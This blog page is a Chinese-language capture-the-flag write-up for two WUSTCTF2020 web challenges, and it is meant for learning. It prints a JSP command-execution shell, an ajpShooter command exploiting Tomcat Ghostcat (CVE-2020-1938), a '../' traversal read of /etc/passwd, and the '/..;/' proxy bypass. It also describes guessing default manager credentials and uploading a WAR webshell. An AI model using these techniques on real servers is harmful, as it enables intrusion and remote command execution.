<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 4.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
  <link rel="stylesheet" href="//cdn.jsdelivr.net/gh/fancyapps/fancybox@3/dist/jquery.fancybox.min.css">
  <link rel="stylesheet" href="/lib/pace/pace-theme-corner-indicator.min.css">
  <script src="/lib/pace/pace.min.js"></script>

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"yoursite.com","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":true},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":true,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="easyweb">
<meta property="og:type" content="article">
<meta property="og:title" content="WUSTCTF2020">
<meta property="og:url" content="http://yoursite.com/2020/07/28/WUSTCTF2020/index.html">
<meta property="og:site_name" content="be a J0K1R">
<meta property="og:description" content="easyweb">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://yoursite.com/2020/07/28/WUSTCTF2020/1.png">
<meta property="og:image" content="http://yoursite.com/2020/07/28/WUSTCTF2020/2.png">
<meta property="og:image" content="http://yoursite.com/2020/07/28/WUSTCTF2020/3.png">
<meta property="og:image" content="http://yoursite.com/2020/07/28/WUSTCTF2020/4.png">
<meta property="og:image" content="http://yoursite.com/2020/07/28/WUSTCTF2020/5.png">
<meta property="og:image" content="http://yoursite.com/2020/07/28/WUSTCTF2020/6.png">
<meta property="og:image" content="http://yoursite.com/2020/07/28/WUSTCTF2020/7.png">
<meta property="og:image" content="http://yoursite.com/2020/07/28/WUSTCTF2020/8.png">
<meta property="og:image" content="http://yoursite.com/2020/07/28/WUSTCTF2020/9.png">
<meta property="article:published_time" content="2020-07-28T04:09:33.000Z">
<meta property="article:modified_time" content="2020-07-28T09:49:00.000Z">
<meta property="article:author" content="Peguin">
<meta property="article:tag" content="WUST">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://yoursite.com/2020/07/28/WUSTCTF2020/1.png">

<link rel="canonical" href="http://yoursite.com/2020/07/28/WUSTCTF2020/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'en'
  };
</script>

  <title>WUSTCTF2020 | be a J0K1R</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

<link rel="alternate" href="/atom.xml" title="be a J0K1R" type="application/atom+xml">
</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">be a J0K1R</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>Tags</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>Search
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="Searching..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="en">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2020/07/28/WUSTCTF2020/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/1.jpg">
      <meta itemprop="name" content="Peguin">
      <meta itemprop="description" content="敢于去想，才会有MEteor的光芒闪耀。">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="be a J0K1R">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          WUSTCTF2020
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>
              

              <time title="Created: 2020-07-28 12:09:33 / Modified: 17:49:00" itemprop="dateCreated datePublished" datetime="2020-07-28T12:09:33+08:00">2020-07-28</time>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h2 id="easyweb"><a href="#easyweb" class="headerlink" title="easyweb"></a>easyweb<a id="more"></a></h2><h3 id="知识点"><a href="#知识点" class="headerlink" title="知识点"></a>知识点</h3><ul>
<li>JSP</li>
<li>CVE-2020-1938幽灵猫文件包含</li>
</ul>
<h3 id="解题步骤"><a href="#解题步骤" class="headerlink" title="解题步骤"></a>解题步骤</h3><p>开题，是一个文件上传，任意上传一个文件，回得到一个链接，点击可以进行下载</p>
<p>测试发现存在任意文件读取，可以任意下载文件</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">2f1070d6-bc24-4d35-adb5-15c7449d3e83.node3.buuoj.cn&#x2F;download?file&#x3D;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;etc&#x2F;passwd</span><br></pre></td></tr></table></figure>

<p>在配置文件中没有发现存在的用户，也就不能够下载.bash_history,也就意味着通过查看history文件来获取flag路径走不通了</p>
<p>测试发现是Tomcat/8.5.42，8009端口是开放的，看了一下题解是考察CVE-2020-1938幽灵猫文件包含</p>
<p>问星盟里的师傅要了个poc，用ajpshooter可以进行包含</p>
<p>上传一个jsp文件拿到路径</p>
<figure class="highlight jsp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">&lt;%@ page <span class="keyword">import</span>=<span class="string">"java.util.*,java.io.*"</span>%&gt;</span><br><span class="line">&lt;% </span><br><span class="line">out.println(<span class="string">"Executing command"</span>);</span><br><span class="line">Process p = Runtime.getRuntime().exec(<span class="string">"ls / -al"</span>);</span><br><span class="line">OutputStream os = p.getOutputStream();</span><br><span class="line">InputStream in = p.getInputStream();</span><br><span class="line">DataInputStream dis = <span class="keyword">new</span> DataInputStream(in);</span><br><span class="line">String disr = dis.readLine();</span><br><span class="line"><span class="keyword">while</span> ( disr != <span class="keyword">null</span> ) &#123;</span><br><span class="line">  out.println(disr); </span><br><span class="line">  disr = dis.readLine(); </span><br><span class="line">&#125;</span><br><span class="line">%&gt;</span><br></pre></td></tr></table></figure>

<img src="/2020/07/28/WUSTCTF2020/1.png" class="">

<figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python3 ajpShooter.py http://<span class="number">2</span>f1070d6-bc24-<span class="number">4</span>d35-adb5-<span class="number">15</span>c7449d3e83.node3.buuoj.cn:<span class="number">8009</span>/ <span class="number">8009</span> /WEB-INF/uploads/b33c1c1f-<span class="number">22</span>ee-<span class="number">4369</span>-<span class="number">95</span><span class="built_in">cd</span>-<span class="number">945</span>e941a65bb.jsp eval</span><br></pre></td></tr></table></figure>

<p>再用内网靶机打的时候总是提示说连接失败，不知道咋回事，就先不管了</p>
<p>下面的步骤很简单，拿到路径之后，读取flag文件，再打一次过去就可以了</p>
<h2 id="WUSTCTF2020-Train-Yourself-To-Be-Godly"><a href="#WUSTCTF2020-Train-Yourself-To-Be-Godly" class="headerlink" title="[WUSTCTF2020]Train Yourself To Be Godly"></a>[WUSTCTF2020]Train Yourself To Be Godly</h2><h2 id="知识点-1"><a href="#知识点-1" class="headerlink" title="知识点"></a>知识点</h2><ul>
<li><p>tomcat目录穿越</p>
</li>
<li><p>TOMCAT管理端弱口令</p>
</li>
<li><p>后台上传war木马</p>
</li>
<li><p>Cookie</p>
</li>
</ul>
<h2 id="解题步骤-1"><a href="#解题步骤-1" class="headerlink" title="解题步骤"></a>解题步骤</h2><h3 id="TOMCAT目录穿越"><a href="#TOMCAT目录穿越" class="headerlink" title="TOMCAT目录穿越"></a>TOMCAT目录穿越</h3><p>根据image师傅的wp找到了Orange师傅在BlackHat上作的议题(<a href="https://www.youtube.com/watch?v=28xWcRegncw" target="_blank" rel="noopener">DEF CON 26 – Orange Tsai – Breaking Parser Logic Take Your Path Normalization Off and Pop 0Days Out</a>)有时间的都可以去瞻仰风采顺便学习一波知识</p>
<p>下面的总结来自视频</p>
<img src="/2020/07/28/WUSTCTF2020/2.png" class="">

<p>Nginx 会解析 /a;evil/b/，并认为这是一个合法的目录请求，而 Tomcat 做解析的时候会自动忽略掉脏数据 ;.*，所以 Tomcat 对此的解析是 /a/b/。也就是说我们从可以通过写 ;+脏数据的方式绕过 Nginx 的反向代理，从而请求本不应该能请求到的非法路径</p>
<p>下面这张图片简单明了</p>
<img src="/2020/07/28/WUSTCTF2020/3.png" class="">

<p>所以第一层目录穿越/..;/可以来到上层目录，也就能够来到后台</p>
<h3 id="TOMCAT管理端弱口令"><a href="#TOMCAT管理端弱口令" class="headerlink" title="TOMCAT管理端弱口令"></a>TOMCAT管理端弱口令</h3><p>根据做题经验，一般是弱口令或者默认口令，用户名一般就是tomcat，然后爆破一下得到密码也是tomcat</p>
<h3 id="后台上传war木马"><a href="#后台上传war木马" class="headerlink" title="后台上传war木马"></a>后台上传war木马</h3><p><a href="https://github.com/LandGrey/webshell-detect-bypass，用这里面的poc" target="_blank" rel="noopener">https://github.com/LandGrey/webshell-detect-bypass，用这里面的poc</a></p>
<p>把jsp打包压缩成war文件，burp抓包上传</p>
<img src="/2020/07/28/WUSTCTF2020/4.png" class="">

<p>可以发现是自动进行了路径拼接，去掉example继续访问</p>
<img src="/2020/07/28/WUSTCTF2020/5.png" class="">

<p>返回401，Unauthorized</p>
<p>这里是一个新知识点，<a href="https://www.jianshu.com/p/4cd42f7359f4，详细介绍" target="_blank" rel="noopener">https://www.jianshu.com/p/4cd42f7359f4，详细介绍</a></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Authorization: Basic base64encode(username+&quot;:&quot;+password)</span><br></pre></td></tr></table></figure>

<p>所以加上头字段就行</p>
<p>这时候会发现返回403，路径访问到了，却无法访问，一般情况下就是权限不够，缺少cookie，这里加上cookie字段，如果还是403，再刷新一下cookie进行添加即可</p>
<img src="/2020/07/28/WUSTCTF2020/6.png" class="">

<p>可以看到上传的1.war已经上传加载完成了，接下来就是访问🐎在的路径了</p>
<img src="/2020/07/28/WUSTCTF2020/7.png" class="">

<p>到这里可以看到路径都没有错，但是还是不能访问，猜测这里可能还是要进行目录穿越，加上/..;/成功</p>
<img src="/2020/07/28/WUSTCTF2020/8.png" class="">

<p>在根目录下找到flag，和原题还是不太一样，原题这里还有一个小trick，这里直接读就行了</p>
<img src="/2020/07/28/WUSTCTF2020/9.png" class="">
    </div>

    
    
    
        <div class="reward-container">
  <div></div>
  <button onclick="var qr = document.getElementById('qr'); qr.style.display = (qr.style.display === 'none') ? 'block' : 'none';">
    Donate
  </button>
  <div id="qr" style="display: none;">
      
      <div style="display: inline-block;">
        <img src="/images/wechatpay.jpg" alt="Peguin WeChat Pay">
        <p>WeChat Pay</p>
      </div>
      
      <div style="display: inline-block;">
        <img src="/images/alipay.jpg" alt="Peguin Alipay">
        <p>Alipay</p>
      </div>

  </div>
</div>

        

<div>
<ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>Post author:  </strong>Peguin
  </li>
  <li class="post-copyright-link">
    <strong>Post link: </strong>
    <a href="http://yoursite.com/2020/07/28/WUSTCTF2020/" title="WUSTCTF2020">http://yoursite.com/2020/07/28/WUSTCTF2020/</a>
  </li>
  <li class="post-copyright-license">
    <strong>Copyright Notice:  </strong>All articles in this blog are licensed under <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</a> unless stating additionally.
  </li>
</ul>
</div>

        

  <div class="followme">
    <p>Welcome to my other publishing channels</p>

    <div class="social-list">

        <div class="social-item">
          <a target="_blank" class="social-link" href="/images/2.jpg">
            <span class="icon">
              <i class="fab fa-weixin"></i>
            </span>

            <span class="label">WeChat</span>
          </a>
        </div>

        <div class="social-item">
          <a target="_blank" class="social-link" href="/atom.xml">
            <span class="icon">
              <i class="fa fa-rss"></i>
            </span>

            <span class="label">RSS</span>
          </a>
        </div>
    </div>
  </div>


      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/WUST/" rel="tag"># WUST</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2020/07/27/PASECA2019-honey-shop/" rel="prev" title="PASECA2019-honey-shop">
      <i class="fa fa-chevron-left"></i> PASECA2019-honey-shop
    </a></div>
      <div class="post-nav-item">
    <a href="/2020/07/30/NCTF2019-phar-matches-everything/" rel="next" title="NCTF2019-phar-matches-everything">
      NCTF2019-phar-matches-everything <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  <div>
  
    <div>
    
        <div style="text-align:center;color: #ccc;font-size:14px;">-------------本文结束<i class="fa fa-paw"></i>感谢您的阅读-------------</div>
    
</div>
  
</div>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#easyweb"><span class="nav-number">1.</span> <span class="nav-text">easyweb</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#知识点"><span class="nav-number">1.1.</span> <span class="nav-text">知识点</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#解题步骤"><span class="nav-number">1.2.</span> <span class="nav-text">解题步骤</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#WUSTCTF2020-Train-Yourself-To-Be-Godly"><span class="nav-number">2.</span> <span class="nav-text">[WUSTCTF2020]Train Yourself To Be Godly</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#知识点-1"><span class="nav-number">3.</span> <span class="nav-text">知识点</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#解题步骤-1"><span class="nav-number">4.</span> <span class="nav-text">解题步骤</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#TOMCAT目录穿越"><span class="nav-number">4.1.</span> <span class="nav-text">TOMCAT目录穿越</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#TOMCAT管理端弱口令"><span class="nav-number">4.2.</span> <span class="nav-text">TOMCAT管理端弱口令</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#后台上传war木马"><span class="nav-number">4.3.</span> <span class="nav-text">后台上传war木马</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Peguin"
      src="/images/1.jpg">
  <p class="site-author-name" itemprop="name">Peguin</p>
  <div class="site-description" itemprop="description">敢于去想，才会有MEteor的光芒闪耀。</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">62</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">34</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/ambitiousleader/" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;ambitiousleader&#x2F;" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="/601209387@qq.com" title="E-Mail → 601209387@qq.com"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://weibo.com/u/6772435317/home?wvr=5&sudaref=graph.qq.com" title="Weibo → https:&#x2F;&#x2F;weibo.com&#x2F;u&#x2F;6772435317&#x2F;home?wvr&#x3D;5&amp;sudaref&#x3D;graph.qq.com" rel="noopener" target="_blank"><i class="fab fa-weibo fa-fw"></i>Weibo</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Peguin</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a>
  </div>

        








      </div>
    </footer>
  </div>

  
  
  <script color='0,0,0' opacity='0.5' zIndex='-1' count='150' src="/lib/canvas-nest/canvas-nest.min.js"></script>
  <script src="/lib/anime.min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script>
  <script src="//cdn.jsdelivr.net/gh/fancyapps/fancybox@3/dist/jquery.fancybox.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>


  <script defer src="/lib/three/three.min.js"></script>


  




  
<script src="/js/local-search.js"></script>













  

  


  
   <canvas class="fireworks" style="position: fixed;left: 0;top: 0;z-index: 1; pointer-events: none;" ></canvas> 
   <script type="text/javascript" src="//cdn.bootcss.com/animejs/2.2.0/anime.min.js"></script> 
   <script type="text/javascript" src="/js/fireworks.js"></script>
  


</body>
</html>
